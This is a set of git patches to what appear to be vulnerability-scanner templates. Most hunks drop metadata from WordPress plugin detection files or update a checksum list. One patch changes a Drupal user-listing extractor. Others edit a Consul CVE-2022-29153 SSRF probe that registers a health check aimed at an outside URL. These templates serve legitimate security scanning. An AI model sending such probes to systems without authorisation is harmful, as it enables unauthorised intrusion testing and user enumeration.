-7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-smushit/ metadata: - max-request: 1 plugin_namespace: wp-smushit wpscan: https://wpscan.com/plugin/wp-smushit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index dedd2e23b6..ab61cc0338 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-statistics/ metadata: - max-request: 1 plugin_namespace: wp-statistics wpscan: https://wpscan.com/plugin/wp-statistics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 03cd7137a8..5f6fbc1f75 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-super-cache/ metadata: - max-request: 1 plugin_namespace: wp-super-cache wpscan: https://wpscan.com/plugin/wp-super-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml index a68d4b7d78..d67150d038 100644 --- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml +++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-user-avatar/ metadata: - max-request: 1 plugin_namespace: wp-user-avatar wpscan: https://wpscan.com/plugin/wp-user-avatar tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index bf9dfc3ad8..beeba7ca69 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpcf7-recaptcha/ metadata: - max-request: 1 plugin_namespace: wpcf7-recaptcha wpscan: https://wpscan.com/plugin/wpcf7-recaptcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index 47911a86a5..c225df7bfd 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpcf7-redirect/ metadata: - max-request: 1 plugin_namespace: wpcf7-redirect wpscan: https://wpscan.com/plugin/wpcf7-redirect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index 1c25b6f488..aaad04cb76 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpforms-lite/ metadata: - max-request: 1 plugin_namespace: wpforms-lite wpscan: https://wpscan.com/plugin/wpforms-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index b36317acd8..ff750a7d2a 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wps-hide-login/ metadata: - max-request: 1 plugin_namespace: wps-hide-login wpscan: https://wpscan.com/plugin/wps-hide-login tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 5eb35dd17e..f1e7595ccd 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpvivid-backuprestore/ metadata: - max-request: 1 plugin_namespace: wpvivid-backuprestore wpscan: https://wpscan.com/plugin/wpvivid-backuprestore tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index ceb2b8d600..4b2769ee46 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/yith-woocommerce-wishlist/ metadata: - max-request: 1 plugin_namespace: yith-woocommerce-wishlist wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist tags: tech,wordpress,wp-plugin,top-100,top-200 From 1608fc166442a5f3396d31de40d2a66de7115747 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sun, 2 Jul 2023 14:44:23 +0530 Subject: [PATCH 271/609] better extractor --- http/exposures/apis/drupal-jsonapi-user-listing.yaml | 11 ++++------- 1 file changed, 4 insertions(+), 7 deletions(-) diff --git a/http/exposures/apis/drupal-jsonapi-user-listing.yaml b/http/exposures/apis/drupal-jsonapi-user-listing.yaml index cfcdef79f4..e3ad4cad96 100644 --- a/http/exposures/apis/drupal-jsonapi-user-listing.yaml +++ b/http/exposures/apis/drupal-jsonapi-user-listing.yaml @@ -14,6 +14,7 @@ info: metadata: max-request: 1 verified: true + shodan-query: http.component:"drupal" tags: drupal,exposure http: @@ -32,10 +33,6 @@ http: - 200 extractors: - - type: regex - part: body - group: 1 - regex: - - '\{"display_name":"([A-Za-z0-9-_]+)"\}' - -# Enhanced by md on 2023/02/08 + - type: json + json: + - '.data[].attributes.display_name' \ No newline at end of file From e453b7c517c36941d802b6d48492304b76307173 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sun, 2 Jul 2023 15:51:33 +0530 Subject: [PATCH 272/609] added non breaking redirect url --- http/cves/2022/CVE-2022-29153.yaml | 12 +++++------- 1 file changed, 5 insertions(+), 7 deletions(-) diff --git a/http/cves/2022/CVE-2022-29153.yaml b/http/cves/2022/CVE-2022-29153.yaml index 871b137c31..e101d1cdc3 100644 --- a/http/cves/2022/CVE-2022-29153.yaml +++ b/http/cves/2022/CVE-2022-29153.yaml @@ -22,20 +22,20 @@ info: max-request: 1 shodan-query: title:"Consul by HashiCorp" verified: true - tags: cve,cve2022,consul,hashicorp,ssrf + tags: cve,cve2022,consul,hashicorp,ssrf,intrusive http: - raw: - - | + - | # register safe test node PUT /v1/agent/check/register HTTP/1.1 Host: {{Hostname}} Content-Type: application/json { "id": "{{randstr}}", - "name": "{{randstr}}", + "name": "TEST NODE", "method": "GET", - "http": "/dev/null", + "http": "http://example.com", "interval": "10s", "timeout": "1s", "disable_redirects": true @@ -50,6 +50,4 @@ http: - type: status status: - - 400 - -# Enhanced by md on 2023/04/07 + - 400 \ No newline at end of file From 91b9e4333979d616797316efb274231009104c39 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sun, 2 Jul 2023 15:52:39 +0530 Subject: [PATCH 273/609] added request to remove node created for test --- http/cves/2022/CVE-2022-29153.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/http/cves/2022/CVE-2022-29153.yaml b/http/cves/2022/CVE-2022-29153.yaml index e101d1cdc3..18ff921c6a 100644 --- a/http/cves/2022/CVE-2022-29153.yaml +++ b/http/cves/2022/CVE-2022-29153.yaml @@ -41,6 +41,11 @@ http: "disable_redirects": true } + - | # deregister test node + PUT /v1/agent/check/deregister/{{randstr}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + matchers-condition: and matchers: - type: word From 86657e13040f276c3327bedcbb2b87f0f178d3c9 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sun, 2 Jul 2023 15:57:35 +0530 Subject: [PATCH 274/609] formatting update --- http/cves/2022/CVE-2022-29153.yaml | 10 +--------- 1 file changed, 1 insertion(+), 9 deletions(-) diff --git a/http/cves/2022/CVE-2022-29153.yaml b/http/cves/2022/CVE-2022-29153.yaml index 18ff921c6a..723de46313 100644 --- a/http/cves/2022/CVE-2022-29153.yaml +++ b/http/cves/2022/CVE-2022-29153.yaml @@ -31,15 +31,7 @@ http: Host: {{Hostname}} Content-Type: application/json - { - "id": "{{randstr}}", - "name": "TEST NODE", - "method": "GET", - "http": "http://example.com", - "interval": "10s", - "timeout": "1s", - "disable_redirects": true - } + {"id":"{{randstr}}","name":"TEST NODE","method":"GET","http":"http://example.com","interval":"10s","timeout":"1s","disable_redirects":true} - | # deregister test node PUT /v1/agent/check/deregister/{{randstr}} HTTP/1.1 From 8584800107e7788e5e19c4d221fd85c4a3ac366f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 2 Jul 2023 14:52:21 +0000 Subject: [PATCH 275/609] Auto Generated New Template Addition List [Sun Jul 2 14:52:21 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 8f31c890f9..ea1a3f63af 100644 --- a/.new-additions +++ b/.new-additions @@ -43,6 +43,7 @@ http/misconfiguration/genieacs-default-jwt.yaml http/misconfiguration/grav-register-admin.yaml http/misconfiguration/installer/spip-install.yaml http/misconfiguration/odoo-unprotected-database.yaml +http/technologies/wordpress/plugins/wp-rollback.yaml http/vulnerabilities/hikvision-ivms-file-upload-rce.yaml http/vulnerabilities/kkfileview-ssrf.yaml http/vulnerabilities/vbulletin/arcade-php-sqli.yaml From a70d0eb88bd1d301af8961ae02b6672af2b0d165 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 2 Jul 2023 14:52:33 +0000 Subject: [PATCH 276/609] Auto Generated Templates Checksum [Sun Jul 2 14:52:33 UTC 2023] :robot: --- templates-checksum.txt | 404 +++++++++++++++++++++-------------------- 1 file changed, 203 insertions(+), 201 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index b9707d3c19..ae501fda8f 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -376,6 +376,7 @@ helpers/wordpress/plugins/wp-multibyte-patch.txt:01fa77eedfbdd7455e8cf0cf239a4de helpers/wordpress/plugins/wp-optimize.txt:7a538645c3b7e9301a46c2d2aeb6d638783ac0e3 helpers/wordpress/plugins/wp-pagenavi.txt:53203701692767a1c2a24e47d94a090230bd8b3f helpers/wordpress/plugins/wp-reset.txt:1a907a1663fa62f8dac219d1a808e2abfcfa4f6a +helpers/wordpress/plugins/wp-rollback.txt:534467bb06aa6d8cb7e27ce2f48b87742c795cad helpers/wordpress/plugins/wp-sitemap-page.txt:1ae2b3145aeda5c94e1cc83b23d74521cf9cc3c5 helpers/wordpress/plugins/wp-smushit.txt:9fa03c66ac4ea9ec21b6098ba43e9b00b5292ee0 helpers/wordpress/plugins/wp-statistics.txt:abe921367c8e125cf93ae37799251c8c4dc1bd22 @@ -3343,7 +3344,7 @@ http/exposed-panels/zyxel/zyxel-vmg1312b10d-login.yaml:3545869a43400918facdaddde http/exposed-panels/zyxel/zyxel-vsg1432b101-login.yaml:35fb29e042415a8f08217ff2dc91707f6d180171 http/exposed-panels/zyxel-router-panel.yaml:ae6e8ef2361d2976ab338b156e857fa944dba4a0 http/exposures/apis/couchbase-buckets-api.yaml:cbb41a24a81bcec180a69d2c30ebdb9de97513b9 -http/exposures/apis/drupal-jsonapi-user-listing.yaml:977e6f5d4ef9528b3ecaf7ec7bc18b62e631c581 +http/exposures/apis/drupal-jsonapi-user-listing.yaml:c7b8ab5819a8c8c516bb9897695190bf33b62dbc http/exposures/apis/jeecg-boot-swagger.yaml:dc3fcfe73d3514b2d0a164fdf65ac60d72b35929 http/exposures/apis/openapi.yaml:411d1b7c30b8150edeb47b6e68b99ee97f211ca1 http/exposures/apis/strapi-page.yaml:9e3c0643b12a045247a1535e141fa4218ed54165 @@ -5327,213 +5328,214 @@ http/technologies/weblogic-detect.yaml:e7cd5e93e7dd6c1625553aa3ad3c5b47e9bfb498 http/technologies/werkzeug-debugger-detect.yaml:d840275037a23f116bab272b6d7658cd9156e8af http/technologies/wms-server-detect.yaml:45c90b9c1ebd969c113b5226d8714e38434a6813 http/technologies/wondercms-detect.yaml:b485ce65e953f7a8d97fc2bdb7e8e81f9900b114 -http/technologies/wordpress/plugins/ad-inserter.yaml:dcc200a556b9acbe534e1602320c36a7de790bdd -http/technologies/wordpress/plugins/add-to-any.yaml:0a6b25111eae4afc694c46433e2c508ea2b90539 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:8602eaf564f6138e2a37576450107bfddbe34a51 +http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed +http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e http/technologies/wordpress/plugins/adminimize.yaml:3f8e114ab592d30a1d4195f22d46de3b9fc28ed0 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:9f506de2bcca6885f35c46248b4504aaad538724 -http/technologies/wordpress/plugins/akismet.yaml:b007755cc48a7a531a0e8fa3c452f9f74b483a5c -http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:8afc7d83bef5b26cba75228a1713dfa60348deba -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:0010ec5c05b69f5ebddee94a9ce0d4b57e44ff27 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:c3da676f6d0fa160cc7394abf4c7d8daf4f0fe96 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:f06de6db272be3eaa03e68865e41fd8cd0889d6e -http/technologies/wordpress/plugins/amp.yaml:6e95aadb383bc37245be179768ef3666595c84d4 -http/technologies/wordpress/plugins/antispam-bee.yaml:cbc2eb83f595229655ccae5e68e201f8fbbdfc3f -http/technologies/wordpress/plugins/astra-sites.yaml:88922bff5ff8b290d2e3d0dff8a85a3a3b71be07 -http/technologies/wordpress/plugins/astra-widgets.yaml:ae52d4e01aa55255f0351c2ebf24e5f6a05f46c1 -http/technologies/wordpress/plugins/autoptimize.yaml:279ce12aeb07a219ddde6d8d3b8bdfe7854b545c -http/technologies/wordpress/plugins/backwpup.yaml:cd98534e9f211629ba533369d19b35889d667dff -http/technologies/wordpress/plugins/better-search-replace.yaml:f0fb1b87ddb8ba11b1b34fc352dcfe60ec8bd32a -http/technologies/wordpress/plugins/better-wp-security.yaml:366bc515c9eea0caf24103811f783af87309bc1e -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:cf370287b480191433f14d22645180352e012309 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:1d9ebeb7f6912abd70c1d5ff211c9bc312e8437c -http/technologies/wordpress/plugins/breeze.yaml:c9d3a0b31311eeb12035b292ea0beb6de100161d -http/technologies/wordpress/plugins/broken-link-checker.yaml:3632271104d26b8bca780450cc8bda6c00a2904a -http/technologies/wordpress/plugins/child-theme-configurator.yaml:3346ba95537fd3c405732fb81d7d459a22cd7eae -http/technologies/wordpress/plugins/classic-editor.yaml:7eac99fe2332bcd2d61540094502911352f9b299 -http/technologies/wordpress/plugins/classic-widgets.yaml:e5b45b37d0a85fd0e54c21716ca57f5ade443aa7 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:9e23b288bbe247ec7fc8a1ee5be22e37886f5fd9 -http/technologies/wordpress/plugins/cloudflare.yaml:66dcdb39cea465cbf038ff429f48620493d09369 -http/technologies/wordpress/plugins/cmb2.yaml:eb137984c82ed5d64c29685b14a6c20d443be844 -http/technologies/wordpress/plugins/coblocks.yaml:0b67f9d55e292e698889ac4b63809c2468d3ed2c -http/technologies/wordpress/plugins/code-snippets.yaml:69feff2b5e8275ebd75f53eff59ee2a912f26636 -http/technologies/wordpress/plugins/coming-soon.yaml:679f3b88eb2da31b32e3180cceccd25d7f60e86e -http/technologies/wordpress/plugins/complianz-gdpr.yaml:35ff2d819699fc3c4d35d44702d09ec841fdb61d -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:81b00a965871cb891ebfbbc4a1368692c89c106a -http/technologies/wordpress/plugins/contact-form-7.yaml:ed800082cc23cf6479f6cc46302bbf76f3a514ef -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:a54ed3ad529d498c2c8b8c0d46b2794a2a729e4f -http/technologies/wordpress/plugins/cookie-law-info.yaml:3bd4cc6049acf423c429e570491594ff3b5007a7 -http/technologies/wordpress/plugins/cookie-notice.yaml:198f4bf51ae86e3bbea603b127caca8f2e5a9057 -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:373d91b4dd303509b7cab8348231294d9ea8cbb3 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:2b73cbbc4598fa9184ea8d3c52b166fc6fee1459 -http/technologies/wordpress/plugins/custom-css-js.yaml:b6291ea7e296f32148ed13099711f9c9f0a2f3ad -http/technologies/wordpress/plugins/custom-fonts.yaml:406c61fa1dbba79b5b47c44d0b972dd409aecf8c -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:15eff4815c8fec2b7907295243812d1f51b1697f -http/technologies/wordpress/plugins/disable-comments.yaml:b7fbaf360dc5246357ccdc9e819d384238cddbb7 -http/technologies/wordpress/plugins/disable-gutenberg.yaml:6af6a0b5b5d096f9563c30a4fd20e0cff5ae03d0 -http/technologies/wordpress/plugins/duplicate-page.yaml:aadea56bc4af197b7e6a6c3f374358b6e0af09af -http/technologies/wordpress/plugins/duplicate-post.yaml:81174cfbdf40b99a59b5d60a4451a7124506825a -http/technologies/wordpress/plugins/duplicator.yaml:f8cffcb16fc6b08355823d28e32a79daa7549677 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:d855708559e81537cb85f5acc6bace4c0d4b3121 -http/technologies/wordpress/plugins/easy-fancybox.yaml:e41968a186a45de3a74a86d93ee1967c67ce7984 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0 +http/technologies/wordpress/plugins/akismet.yaml:c2fc28f9352683a8951ff433fcd774b49feaf0eb +http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:65a31735844abbc42c6c38fb1b2ce66f3b70637e +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:c5fb4f5f04f4d44c858cce9bdcbe7f3606a68f65 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:6b1337d51ba70633ffcb1f7ee597e124cc495a61 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc +http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2 +http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12 +http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b +http/technologies/wordpress/plugins/astra-widgets.yaml:f7265954d79f2976d51ea04401b8371971a8d226 +http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77 +http/technologies/wordpress/plugins/backwpup.yaml:f465ab2fac2cb5d33cbb273e95c99d266ad6ac46 +http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61 +http/technologies/wordpress/plugins/better-wp-security.yaml:31ac060d2dac4ff16c700f62cce3e478c5f0f66f +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f +http/technologies/wordpress/plugins/breeze.yaml:c366593628c83c9881d375890e07e63cfa8d552b +http/technologies/wordpress/plugins/broken-link-checker.yaml:df71812c7fa02109aba6905b6adde546c4ac0365 +http/technologies/wordpress/plugins/child-theme-configurator.yaml:2cb6529ade42bd6e577fa6f61a9f3d66cac32e4f +http/technologies/wordpress/plugins/classic-editor.yaml:fc682aceca9126c4e072c73ff29851a83979cd55 +http/technologies/wordpress/plugins/classic-widgets.yaml:17210161b9efea8396d8445ae4d4cba98e660ba4 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0a881196a64744bda68c6f1c2681bfd2f84d0ce3 +http/technologies/wordpress/plugins/cloudflare.yaml:431bca4737941e71c01f7ab9ce8f7fc45c7670a2 +http/technologies/wordpress/plugins/cmb2.yaml:4b3bfa4f94b99997f974f02d6ba60bde2e9444ff +http/technologies/wordpress/plugins/coblocks.yaml:a26991d803bee4cd24a8fee62e7eea4c1bb2d43a +http/technologies/wordpress/plugins/code-snippets.yaml:d1187e6e58951bbe1df401c1672bfdff86f7422e +http/technologies/wordpress/plugins/coming-soon.yaml:516f9d73fc15789a4c0fd099fc7e4a95fdb0f14f +http/technologies/wordpress/plugins/complianz-gdpr.yaml:eabd8b2e7f97de8a60b3a5fb96527910bbbad58d +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:f28aad38a4e879235502a3c7abc1eaac996a53af +http/technologies/wordpress/plugins/contact-form-7.yaml:7ce85ff130f51b9380933293b884a7bd421404eb +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:6acd231ac9daa0db29c8cd2ffc15f41bc9ababfb +http/technologies/wordpress/plugins/cookie-law-info.yaml:1105f8252666a84437fde4945cb5a745ad4cc50e +http/technologies/wordpress/plugins/cookie-notice.yaml:b9cf44d527d7f63a289ac0abad8b1bf0391c678c +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:fd3988a6aa03120a677f1ac21834661ce302bf06 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:9e9f37e33437158126c61d2345001ba7d43111e7 +http/technologies/wordpress/plugins/custom-css-js.yaml:ac02742559638f742970cf6f592b71ef94d7f9e0 +http/technologies/wordpress/plugins/custom-fonts.yaml:b5239c6679c226595580307f84fbc3db513ed75c +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e185e81e02d08d559172e553c9f18124e8b73cf9 +http/technologies/wordpress/plugins/disable-comments.yaml:09bef99b79703f8fb60a432875789f36c26d7606 +http/technologies/wordpress/plugins/disable-gutenberg.yaml:589db5b5a0c17c5eaa8aed3193f9b69c9c23d157 +http/technologies/wordpress/plugins/duplicate-page.yaml:d686911fad8f2cb38247ac68abde6798a75b3d1a +http/technologies/wordpress/plugins/duplicate-post.yaml:95098c9e322716725f42517fa291102be287a7b5 +http/technologies/wordpress/plugins/duplicator.yaml:492e234d249eac52e0108c1bef2ecd318f8264a7 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:f4ad26e875f78de817b30426b87b4a68cbaeaea2 +http/technologies/wordpress/plugins/easy-fancybox.yaml:e7f7398e360ec865076174206ebfa8588fe9d55e http/technologies/wordpress/plugins/easy-google-fonts.yaml:7f9b02d3513ca7ddbcb4bf0c320b049328a8bc45 -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d4e688094d6176459fa903f03e5794848ed3e201 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:2ff0f61226aa4cb1038d1deadb00b628fb11fcab -http/technologies/wordpress/plugins/elementor.yaml:9b1e616a8d2a7aa975ade54df7ac7b163608fff8 -http/technologies/wordpress/plugins/elementskit-lite.yaml:9009b721e1e10135e8fc85c73ae6f5751e4caa77 -http/technologies/wordpress/plugins/enable-media-replace.yaml:bfdc2e4c8cee949b2a0acf9cddee4a5f274c436e -http/technologies/wordpress/plugins/envato-elements.yaml:7f185f2a48254a6e7eef6b04e33ff07f51ae00ca -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:1b41b69c540670905044d6160174bac6e3d4f4fa -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:ec19e982e470dd524292e10f70375d8ae67a8444 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:55791747a6edcd4640bf8a226177d45718be4016 -http/technologies/wordpress/plugins/fast-indexing-api.yaml:f2c919579c4175d28f460e99e74a7df0fa2ea0b1 -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:598bc18c24af5cbccae989df8850aca7340f8fba -http/technologies/wordpress/plugins/flamingo.yaml:5c4b2b9c517ac144776be3e131329935bae6be4d -http/technologies/wordpress/plugins/fluentform.yaml:cd0f4c67c902c283b058c0ed20d9e32affaee823 -http/technologies/wordpress/plugins/font-awesome.yaml:223d15376ae6c792e52d7b98d397937c66e393d0 -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:3bfb2d4b85fff045a44a5c46c4898e4b597b6a24 -http/technologies/wordpress/plugins/formidable.yaml:6d9ebfa32167bad11c9f2cf5d0bc667ec79beeca -http/technologies/wordpress/plugins/forminator.yaml:65bf97572551361b4820617abf6f162b6d3f9336 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:524a46fd50ca7ec755f6582146688a4fa2143b6a -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:527715654d1ac3521c3f4ad6efb0035abce008f3 -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:8f722e7fd4d82c5a072583269575be55ab6d3124 -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:2e6e89dc6c07e0014c4e5eac1dd7dde3afe8f7ae -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:d43e8f2af19c16d5e9d768be20676774bb14653f -http/technologies/wordpress/plugins/google-site-kit.yaml:ccc5e9a3f54cc6770ef8890b45f19920222168b0 -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:c107504273792eb9abb00fe3212427a55f7e5214 -http/technologies/wordpress/plugins/gtranslate.yaml:867ab5c990ea0420f453a184bc502168a32ef7fc -http/technologies/wordpress/plugins/gutenberg.yaml:3e27b07a160e8df4cd945aaafdcae5571c5a2ffb -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:a156496d7c3273674d39d1fcec6e8e247f70ebe9 -http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1b17cd6fbfb1b2b4610c8bebd52a32d56ccb5913 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:8474198d250ca4bdc0ab5c12cf23a9b51fd06372 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:b0587c2319227b07a3d692aaa7c257888be39765 -http/technologies/wordpress/plugins/header-footer.yaml:df3106a1b40b9c5568e26e4b607dbd0d4da769e2 -http/technologies/wordpress/plugins/health-check.yaml:dbf87bd510108d015a180d3fbc03d45481974f23 -http/technologies/wordpress/plugins/hello-dolly.yaml:7b7773fcf3893f955e07987ab3d466472e47fdd7 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:acf3cb5d65df4d20d1cb4519f1cce6d463570317 -http/technologies/wordpress/plugins/imagify.yaml:07d8654f8cfc0bc3fac475b458b6f8b13ff29461 -http/technologies/wordpress/plugins/imsanity.yaml:d5a2c4b44c29eda5354bbc3339421a248342f5e4 -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:29df4caa3ec72e270a5b680cc6dba22aa42f7b30 -http/technologies/wordpress/plugins/instagram-feed.yaml:bdd26849be9346090645fcedf5e7c21f9634433e -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:4f680679454744ffce822ef8103f9e502945cc5b -http/technologies/wordpress/plugins/iwp-client.yaml:d439a22263fa52c4f97b1ddbf87db0463426d40f -http/technologies/wordpress/plugins/jetpack.yaml:bf3f2dc921b1ed41c10ceec1ddf4dc25f1b53cde -http/technologies/wordpress/plugins/kadence-blocks.yaml:16f4dd00133170c2d369e444dfcc3d37ff77d43a -http/technologies/wordpress/plugins/kirki.yaml:c97031d4389c1390ccf770aa86ab3b3fa35f1dac -http/technologies/wordpress/plugins/leadin.yaml:459b7e97592be0f092c2b3b49de24d496bc02fcc -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:24602fdc3551beca9567c9610cd9d3b4fee0f7b3 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:7f83455afdb4b27fb6b3db7237206de3a6cb7046 -http/technologies/wordpress/plugins/litespeed-cache.yaml:80d84515b9a1ce2d934ae05e2f5a88f18e0ca5a8 -http/technologies/wordpress/plugins/loco-translate.yaml:6e88f4e9ef7197d8de502fd14f47f79b4b46911b -http/technologies/wordpress/plugins/loginizer.yaml:fd0116df11b6730957c17fea8fcc5ce1a7df96c0 -http/technologies/wordpress/plugins/loginpress.yaml:318058c81cfee1d55915a2fbf2ac027d7462b50c -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:d96413ced20b451ef657a655f3ba333575a1b2e3 -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:d166e9194d9700180585945fa717b01849fb0519 -http/technologies/wordpress/plugins/mailpoet.yaml:28a36b2dbcef7a1e49f30ff165907da3576693b4 -http/technologies/wordpress/plugins/maintenance.yaml:46343810ab17d627079432942446302dca630eeb -http/technologies/wordpress/plugins/mainwp-child.yaml:1a90cfff9eaeab8c397b5269876f7b469cfff7b4 -http/technologies/wordpress/plugins/malcare-security.yaml:20cae47466ca8201c6fbfd58324fe1bc90db9623 -http/technologies/wordpress/plugins/megamenu.yaml:dcdca3e0704e25dcc813c121039640b907274fcd 